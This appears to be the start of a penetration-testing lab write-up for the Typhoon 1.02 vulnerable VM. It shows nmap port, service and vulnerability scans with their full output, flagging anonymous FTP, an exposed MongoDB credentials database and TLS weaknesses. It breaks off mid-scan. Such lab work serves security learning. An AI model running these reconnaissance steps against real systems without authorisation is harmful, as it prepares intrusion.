TYPHOON_1_02 target VM

Information gathering

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.121
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-01 11:44 EDT
Nmap scan report for 192.168.56.121
Host is up (0.00028s latency).
Not shown: 65511 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
53/tcp open domain
80/tcp open http
110/tcp open pop3
111/tcp open rpcbind
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
631/tcp open ipp
993/tcp open imaps
995/tcp open pop3s
2049/tcp open nfs
3306/tcp open mysql
5432/tcp open postgresql
6379/tcp open redis
8080/tcp open http-proxy
27017/tcp open mongod
34114/tcp open unknown
34329/tcp open unknown
41559/tcp open unknown
43004/tcp open unknown
49357/tcp open unknown
MAC Address: 08:00:27:2D:C0:8F (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 8.53 seconds

That is a lot of open ports. We will peel it back layer by layer, starting with a version and default-script scan restricted to exactly the ports found, so nmap does not have to probe the full range a second time.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p21,22,25,53,80,110,111,139,143,445,631,993,995,2049,3306,5432,6379,8080,27017,34114,34329,41559,43004,49357 192.168.56.121
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-01 11:48 EDT
Nmap scan report for 192.168.56.121
Host is up (0.00030s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.56.106
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 02:df:b3:1b:01:dc:5e:fd:f9:96:d7:5b:b7:d6:7b:f9 (DSA)
| 2048 de:af:76:27:90:2a:8f:cf:0b:2f:22:f8:42:36:07:dd (RSA)
| 256 70:ae:36:6c:42:7d:ed:1b:c0:40:fc:2d:00:8d:87:11 (ECDSA)
|_ 256 bb:ce:f2:98:64:f7:8f:ae:f0:dd:3c:23:3b:a6:0f:61 (ED25519)
25/tcp open smtp Postfix smtpd
|_ssl-date: TLS randomness does not represent time
|_smtp-commands: typhoon, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
| ssl-cert: Subject: commonName=typhoon
| Not valid before: 2018-10-22T19:38:20
|_Not valid after: 2028-10-19T19:38:20
53/tcp open domain ISC BIND 9.9.5-3 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.9.5-3-Ubuntu
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Typhoon Vulnerable VM by PRISMA CSI
| http-robots.txt: 1 disallowed entry
|_/mongoadmin/
|_http-server-header: Apache/2.4.7 (Ubuntu)
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: TOP RESP-CODES UIDL SASL STLS PIPELINING CAPA AUTH-RESP-CODE
| ssl-cert: Subject: commonName=typhoon/organizationName=Dovecot mail server
| Not valid before: 2018-10-22T19:38:49
|_Not valid after: 2028-10-21T19:38:49
|_ssl-date: TLS randomness does not represent time
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100003 2,3,4 2049/udp nfs
| 100003 2,3,4 2049/udp6 nfs
| 100005 1,2,3 43189/tcp6 mountd
| 100005 1,2,3 47958/udp mountd
| 100005 1,2,3 49357/tcp mountd
| 100005 1,2,3 58024/udp6 mountd
| 100021 1,3,4 41979/tcp6 nlockmgr
| 100021 1,3,4 43004/tcp nlockmgr
| 100021 1,3,4 56771/udp nlockmgr
| 100021 1,3,4 57546/udp6 nlockmgr
| 100024 1 34114/tcp status
| 100024 1 42529/udp6 status
| 100024 1 51309/tcp6 status
| 100024 1 58257/udp status
| 100227 2,3 2049/tcp nfs_acl
| 100227 2,3 2049/tcp6 nfs_acl
| 100227 2,3 2049/udp nfs_acl
|_ 100227 2,3 2049/udp6 nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd (Ubuntu)
|_ssl-date: TLS randomness does not represent time
|_imap-capabilities: more STARTTLS LITERAL+ IMAP4rev1 post-login have listed LOGIN-REFERRALS OK capabilities Pre-login ENABLE LOGINDISABLEDA0001 IDLE SASL-IR ID
| ssl-cert: Subject: commonName=typhoon/organizationName=Dovecot mail server
| Not valid before: 2018-10-22T19:38:49
|_Not valid after: 2028-10-21T19:38:49
445/tcp open netbios-ssn Samba smbd 4.1.6-Ubuntu (workgroup: WORKGROUP)
631/tcp open ipp CUPS 1.7
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: CUPS/1.7 IPP/2.1
| http-methods:
|_ Potentially risky methods: PUT
|_http-title: Home - CUPS 1.7.2
993/tcp open ssl/imap Dovecot imapd (Ubuntu)
|_imap-capabilities: more AUTH=PLAINA0001 IMAP4rev1 post-login have listed LOGIN-REFERRALS OK capabilities Pre-login ENABLE ID IDLE SASL-IR LITERAL+
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=typhoon/organizationName=Dovecot mail server
| Not valid before: 2018-10-22T19:38:49
|_Not valid after: 2028-10-21T19:38:49
995/tcp open ssl/pop3 Dovecot pop3d
| ssl-cert: Subject: commonName=typhoon/organizationName=Dovecot mail server
| Not valid before: 2018-10-22T19:38:49
|_Not valid after: 2028-10-21T19:38:49
|_pop3-capabilities: TOP RESP-CODES UIDL SASL(PLAIN) USER PIPELINING CAPA AUTH-RESP-CODE
|_ssl-date: TLS randomness does not represent time
2049/tcp open nfs 2-4 (RPC #100003)
3306/tcp open mysql MySQL (unauthorized)
5432/tcp open postgresql PostgreSQL DB 9.3.3 - 9.3.5
| ssl-cert: Subject: commonName=typhoon
| Not valid before: 2018-10-22T19:38:20
|_Not valid after: 2028-10-19T19:38:20
|_ssl-date: TLS randomness does not represent time
6379/tcp open redis Redis key-value store 4.0.11
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-open-proxy: Proxy might be redirecting requests
| http-methods:
|_ Potentially risky methods: PUT DELETE
|_http-title: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
27017/tcp open mongodb MongoDB 3.0.15 3.0.15
| mongodb-info:
| MongoDB Build info
| OpenSSLVersion = OpenSSL 1.0.1f 6 Jan 2014
| loaderFlags =
| bits = 64
| ok = 1.0
| versionArray
| 3 = 0
| 0 = 3
| 1 = 0
| 2 = 15
| allocator = tcmalloc
| maxBsonObjectSize = 16777216
| compilerFlags = -Wnon-virtual-dtor -Woverloaded-virtual -std=c++11 -fno-omit-frame-pointer -fPIC -fno-strict-aliasing -ggdb -pthread -Wall -Wsign-compare -Wno-unknown-pragmas -Winvalid-pch -pipe -Werror -O3 -Wno-unused-local-typedefs -Wno-unused-function -Wno-deprecated-declarations -Wno-unused-but-set-variable -Wno-missing-braces -fno-builtin-memcmp -std=c99
| debug = false
| javascriptEngine = V8
| version = 3.0.15
| gitVersion = b8ff507269c382bc100fc52f75f48d54cd42ec3b
| sysInfo = Linux ip-10-71-195-23 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 BOOST_LIB_VERSION=1_49
| Server status
| ok = 1.0
| cursors
| timedOut = 0
| totalOpen = 0
| pinned = 0
| totalNoTimeout = 0
| clientCursors_size = 0
| note = deprecated, use server status metrics
| process = mongod
| uptimeMillis = 356783
| extra_info
| heap_usage_bytes = 63081592
| page_faults = 171
| note = fields vary by platform
| globalLock
| activeClients
| writers = 0
| total = 10
| readers = 0
| currentQueue
| writers = 0
| total = 0
| readers = 0
| totalTime = 356773000
| connections
| totalCreated = 4
| available = 51198
| current = 2
| locks
| Database
| acquireCount
| W = 9
| r = 646
| R = 2
| MMAPV1Journal
| acquireCount
| w = 22
| R = 3287
| r = 646
| Global
| timeAcquiringMicros
| r = 1025
| acquireCount
| w = 9
| W = 5
| r = 1310
| acquireWaitCount
| r = 1
| Collection
| acquireCount
| R = 669
| dur
| journaledMB = 0.0
| timeMs
| writeToDataFiles = 0
| prepLogBuffer = 0
| remapPrivateView = 0
| commits = 0
| dt = 3040
| writeToJournal = 0
| commitsInWriteLock = 0
| commits = 28
| compression = 0.0
| writeToDataFilesMB = 0.0
| earlyCommits = 0
| commitsInWriteLock = 0
| writeBacksQueued = false
| mem
| resident = 67
| supported = true
| mappedWithJournal = 320
| bits = 64
| virtual = 515
| mapped = 160
| pid = 1312
| uptimeEstimate = 298.0
| metrics
| repl
| apply
| ops = 0
| batches
| totalMillis = 0
| num = 0
| preload
| indexes
| totalMillis = 0
| num = 0
| docs
| totalMillis = 0
| num = 0
| buffer
| count = 0
| sizeBytes = 0
| maxSizeBytes = 268435456
| network
| readersCreated = 0
| ops = 0
| bytes = 0
| getmores
| totalMillis = 0
| num = 0
| cursor
| open
| noTimeout = 0
| total = 0
| pinned = 0
| timedOut = 0
| ttl
| deletedDocuments = 0
| passes = 5
| queryExecutor
| scanned = 0
| scannedObjects = 0
| getLastError
| wtimeouts = 0
| wtime
| totalMillis = 0
| num = 0
| commands
| _isSelf
| failed = 0
| total = 0
| grantRolesToRole
| failed = 0
| total = 0
| findAndModify
| failed = 0
| total = 0
| buildInfo
| failed = 0
| total = 0
| getPrevError
| failed = 0
| total = 0
| copydb
| failed = 0
| total = 0
| copydbsaslstart
| failed = 0
| total = 0
| explain
| failed = 0
| total = 0
| connectionStatus
| failed = 0
| total = 0
| shardingState
| failed = 0
| total = 0
| rolesInfo
| failed = 0
| total = 0
| mergeChunks
| failed = 0
| total = 0
| _getUserCacheGeneration
| failed = 0
| total = 0
| revokeRolesFromUser
| failed = 0
| total = 0
| dropAllUsersFromDatabase
| failed = 0
| total = 0
| applyOps
| failed = 0
| total = 0
| replSetFreeze
| failed = 0
| total = 0
| moveChunk
| failed = 0
| total = 0
| group
| failed = 0
| total = 0
| logRotate
| failed = 0
| total = 0
| currentOpCtx
| failed = 0
| total = 0
| dropUser
| failed = 0
| total = 0
| writebacklisten
| failed = 0
| total = 0
| serverStatus
| failed = 0
| total = 2
| replSetSyncFrom
| failed = 0
| total = 0
| authSchemaUpgrade
| failed = 0
| total = 0
| geoNear
| failed = 0
| total = 0
| insert
| failed = 0
| total = 0
| connPoolStats
| failed = 0
| total = 0
| cloneCollectionAsCapped
| failed = 0
| total = 0
| getParameter
| failed = 0
| total = 0
| saslContinue
| failed = 0
| total = 0
| grantPrivilegesToRole
| failed = 0
| total = 0
| usersInfo
| failed = 0
| total = 0
| forceerror
| failed = 0
| total = 0
| dataSize
| failed = 0
| total = 0
| touch
| failed = 0
| total = 0
| replSetInitiate
| failed = 0
| total = 0
| repairDatabase
| failed = 0
| total = 0
| planCacheClear
| failed = 0
| total = 0
| availableQueryOptions
| failed = 0
| total = 0
| repairCursor
| failed = 0
| total = 0
| drop
| failed = 0
| total = 0
| copydbgetnonce
| failed = 0
| total = 0
| replSetUpdatePosition
| failed = 0
| total = 0
| updateRole
| failed = 0
| total = 0
| dropAllRolesFromDatabase
| failed = 0
| total = 0
| appendOplogNote
| failed = 0
| total = 0
| setParameter
| failed = 0
| total = 0
| getShardVersion
| failed = 0
| total = 0
| top
| failed = 0
| total = 0
| setShardVersion
| failed = 0
| total = 0
| dropDatabase
| failed = 0
| total = 0
| updateUser
| failed = 0
| total = 0
| listCollections
| failed = 0
| total = 0
| _recvChunkAbort
| failed = 0
| total = 0
| replSetHeartbeat
| failed = 0
| total = 0
| revokePrivilegesFromRole
| failed = 0
| total = 0
| planCacheSetFilter
| failed = 0
| total = 0
| replSetStepDown
| failed = 0
| total = 0
| getnonce
| failed = 0
| total = 0
| createIndexes
| failed = 0
| total = 0
| getCmdLineOpts
| failed = 0
| total = 0
| planCacheListQueryShapes
| failed = 0
| total = 0
| getLog
| failed = 0
| total = 0
| replSetElect
| failed = 0
| total = 0
| planCacheClearFilters
| failed = 0
| total = 0
| clone
| failed = 0
| total = 0
| <UNKNOWN> = 0
| parallelCollectionScan
| failed = 0
| total = 0
| dbStats
| failed = 0
| total = 0
| dropIndexes
| failed = 0
| total = 0
| splitChunk
| failed = 0
| total = 0
| _migrateClone
| failed = 0
| total = 0
| connPoolSync
| failed = 0
| total = 0
| saslStart
| failed = 0
| total = 0
| delete
| failed = 0
| total = 0
| find
| failed = 0
| total = 0
| replSetGetRBID
| failed = 0
| total = 0
| shutdown
| failed = 0
| total = 0
| whatsmyuri
| failed = 0
| total = 0
| ping
| failed = 0
| total = 0
| mapreduce
| shardedfinish
| failed = 0
| total = 0
| handshake
| failed = 0
| total = 0
| invalidateUserCache
| failed = 0
| total = 0
| unsetSharding
| failed = 0
| total = 0
| create
| failed = 0
| total = 0
| logout
| failed = 0
| total = 0
| hostInfo
| failed = 0
| total = 0
| count
| failed = 0
| total = 0
| replSetMaintenance
| failed = 0
| total = 0
| reIndex
| failed = 0
| total = 0
| splitVector
| failed = 0
| total = 0
| eval
| failed = 0
| total = 0
| update
| failed = 0
| total = 0
| listDatabases
| failed = 0
| total = 1
| planCacheListPlans
| failed = 0
| total = 0
| createRole
| failed = 0
| total = 0
| cursorInfo
| failed = 0
| total = 0
| validate
| failed = 0
| total = 0
| resetError
| failed = 0
| total = 0
| mapReduce
| failed = 0
| total = 0
| isMaster
| failed = 0
| total = 0
| listCommands
| failed = 0
| total = 0
| _transferMods
| failed = 0
| total = 0
| filemd5
| failed = 0
| total = 0
| profile
| failed = 0
| total = 0
| replSetGetConfig
| failed = 0
| total = 0
| createUser
| failed = 0
| total = 0
| collMod
| failed = 0
| total = 0
| diagLogging
| failed = 0
| total = 0
| medianKey
| failed = 0
| total = 0
| dbHash
| failed = 0
| total = 0
| driverOIDTest
| failed = 0
| total = 0
| replSetReconfig
| failed = 0
| total = 0
| _recvChunkStatus
| failed = 0
| total = 0
| checkShardingIndex
| failed = 0
| total = 0
| aggregate
| failed = 0
| total = 0
| _recvChunkCommit
| failed = 0
| total = 0
| cleanupOrphaned
| failed = 0
| total = 0
| grantRolesToUser
| failed = 0
| total = 0
| revokeRolesFromRole
| failed = 0
| total = 0
| geoSearch
| failed = 0
| total = 0
| getShardMap
| failed = 0
| total = 0
| _recvChunkStart
| failed = 0
| total = 0
| resync
| failed = 0
| total = 0
| getLastError
| failed = 0
| total = 0
| cloneCollection
| failed = 0
| total = 0
| replSetGetStatus
| failed = 0
| total = 0
| planCacheListFilters
| failed = 0
| total = 0
| _mergeAuthzCollections
| failed = 0
| total = 0
| listIndexes
| failed = 0
| total = 0
| authenticate
| failed = 0
| total = 0
| features
| failed = 0
| total = 0
| shardConnPoolStats
| failed = 0
| total = 0
| compact
| failed = 0
| total = 0
| fsync
| failed = 0
| total = 0
| collStats
| failed = 0
| total = 0
| convertToCapped
| failed = 0
| total = 0
| renameCollection
| failed = 0
| total = 0
| distinct
| failed = 0
| total = 0
| replSetFresh
| failed = 0
| total = 0
| dropRole
| failed = 0
| total = 0
| operation
| fastmod = 0
| writeConflicts = 0
| idhack = 0
| scanAndOrder = 0
| record
| moves = 0
| storage
| freelist
| search
| requests = 0
| scanned = 0
| bucketExhausted = 0
| document
| deleted = 0
| inserted = 0
| returned = 0
| updated = 0
| network
| numRequests = 2
| bytesOut = 10166
| bytesIn = 128
| opcountersRepl
| command = 0
| insert = 0
| update = 0
| query = 0
| delete = 0
| getmore = 0
| backgroundFlushing
| last_ms = 0
| last_finished = 1688255256082
| flushes = 5
| total_ms = 1
| average_ms = 0.2
| host = typhoon.local
| opcounters
| command = 3
| insert = 0
| update = 0
| query = 1
| delete = 0
| getmore = 0
| uptime = 357.0
| storageEngine
| name = mmapv1
| version = 3.0.15
| asserts
| msg = 0
| regular = 0
| warning = 0
| rollovers = 0
| user = 0
|_ localTime = 1688255312772
| mongodb-databases:
| ok = 1.0
| totalSize = 167772160.0
| databases
| 1
| name = local
| empty = false
| sizeOnDisk = 83886080.0
| 0
| name = credentials
| empty = false
|_ sizeOnDisk = 83886080.0
34114/tcp open status 1 (RPC #100024)
34329/tcp open mountd 1-3 (RPC #100005)
41559/tcp open mountd 1-3 (RPC #100005)
43004/tcp open nlockmgr 1-4 (RPC #100021)
49357/tcp open mountd 1-3 (RPC #100005)
MAC Address: 08:00:27:2D:C0:8F (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Hosts: typhoon, TYPHOON; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-security-mode:
| 3:0:0:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: TYPHOON, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time:
| date: 2023-07-01T23:48:32
|_ start_date: N/A
|_clock-skew: mean: 6h59m55s, deviation: 1h43m55s, median: 7h59m54s
| smb-os-discovery:
| OS: Unix (Samba 4.1.6-Ubuntu)
| Computer name: typhoon
| NetBIOS computer name: TYPHOON\x00
| Domain name: local
| FQDN: typhoon.local
|_ System time: 2023-07-02T02:48:32+03:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.81 seconds

Hmm, that is a lot of information. Run the vuln NSE script category against the same port list as well, then analyze all three scans together.

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p21,22,25,53,80,110,111,139,143,445,631,993,995,2049,3306,5432,6379,8080,27017,34114,34329,41559,43004,49357 192.168.56.121

[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-02 01:56 EDT
Nmap scan report for 192.168.56.121
Host is up (0.00013s latency).

PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
| ssl-dh-params:
| VULNERABLE:
| Anonymous Diffie-Hellman Key Exchange MitM Vulnerability
| State: VULNERABLE
| Transport Layer Security (TLS) services that use anonymous
| Diffie-Hellman key exchange only provide protection against passive
| eavesdropping, and are vulnerable to active man-in-the-middle attacks
| which could completely compromise the confidentiality and integrity
| of any data exchanged over the resulting session.
| Check results:
| ANONYMOUS DH GROUP 1
| Cipher Suite: TLS_DH_anon_WITH_SEED_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: postfix builtin
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
| https://www.ietf.org/rfc/rfc2246.txt
|
| Transport Layer Security (TLS) Protocol DHE_EXPORT Ciphers Downgrade MitM (Logjam)
| State: VULNERABLE
| IDs: CVE:CVE-2015-4000 BID:74733
| The Transport Layer Security (TLS) protocol contains a flaw that is
| triggered when handling Diffie-Hellman key exchanges defined with
| the DHE_EXPORT cipher. This may allow a man-in-the-middle attacker
| to downgrade the security of a TLS session to 512-bit export-grade
| cryptography, which is significantly weaker, allowing the attacker
| to more easily break the encryption and monitor or tamper with
| the encrypted stream.
| Disclosure date: 2015-5-19
| Check results:
| EXPORT-GRADE DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: Unknown/Custom-generated
| Modulus Length: 512
| Generator Length: 8
| Public Key Length: 512
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000
| https://www.securityfocus.com/bid/74733
| https://weakdh.org
|
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_SEED_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: postfix builtin
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2014-3566 BID:70574
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_RSA_WITH_AES_128_CBC_SHA
| TLS_FALLBACK_SCSV properly implemented
| References:
| https://www.imperialviolet.org/2014/10/14/poodle.html
| https://www.securityfocus.com/bid/70574
| https://www.openssl.org/~bodo/ssl-poodle.pdf
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
| smtp-vuln-cve2010-4344:
|_ The SMTP server is not Exim: NOT VULNERABLE
53/tcp open domain
80/tcp open http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /robots.txt: Robots file
|_ /phpmyadmin/: phpMyAdmin
| http-fileupload-exploiter:
|
| Couldn't find a file-type field.
|
|_ Couldn't find a file-type field.
110/tcp open pop3
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_SEED_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: Unknown/Custom-generated
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2014-3566 BID:70574
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_RSA_WITH_AES_128_CBC_SHA
| TLS_FALLBACK_SCSV properly implemented
| References:
| https://www.imperialviolet.org/2014/10/14/poodle.html
| https://www.securityfocus.com/bid/70574
| https://www.openssl.org/~bodo/ssl-poodle.pdf
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
111/tcp open rpcbind
139/tcp open netbios-ssn
143/tcp open imap
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2014-3566 BID:70574
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_RSA_WITH_AES_128_CBC_SHA
| TLS_FALLBACK_SCSV properly implemented
| References:
| https://www.imperialviolet.org/2014/10/14/poodle.html
| https://www.securityfocus.com/bid/70574
| https://www.openssl.org/~bodo/ssl-poodle.pdf
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_SEED_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: Unknown/Custom-generated
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
445/tcp open microsoft-ds
631/tcp open ipp
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: VULNERABLE
| IDs: CVE:CVE-2014-3566 BID:70574
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_RSA_WITH_AES_128_CBC_SHA
| References:
| https://www.imperialviolet.org/2014/10/14/poodle.html
| https://www.securityfocus.com/bid/70574
| https://www.openssl.org/~bodo/ssl-poodle.pdf
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
993/tcp open imaps
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2014-3566 BID:70574
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_RSA_WITH_AES_128_CBC_SHA
| TLS_FALLBACK_SCSV properly implemented
| References:
| https://www.imperialviolet.org/2014/10/14/poodle.html
| https://www.securityfocus.com/bid/70574
| https://www.openssl.org/~bodo/ssl-poodle.pdf
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_SEED_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: Unknown/Custom-generated
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
995/tcp open pop3s
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2014-3566 BID:70574
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_RSA_WITH_AES_128_CBC_SHA
| TLS_FALLBACK_SCSV properly implemented
| References:
| https://www.imperialviolet.org/2014/10/14/poodle.html
| https://www.securityfocus.com/bid/70574
| https://www.openssl.org/~bodo/ssl-poodle.pdf
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_SEED_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: Unknown/Custom-generated
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
2049/tcp open nfs
3306/tcp open mysql
5432/tcp open postgresql
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2014-3566 BID:70574
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_RSA_WITH_AES_128_CBC_SHA
| TLS_FALLBACK_SCSV properly implemented
| References:
| https://www.imperialviolet.org/2014/10/14/poodle.html
| https://www.securityfocus.com/bid/70574
| https://www.openssl.org/~bodo/ssl-poodle.pdf
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_SEED_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: Unknown/Custom-generated
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
6379/tcp open redis
8080/tcp open http-proxy
| http-enum:
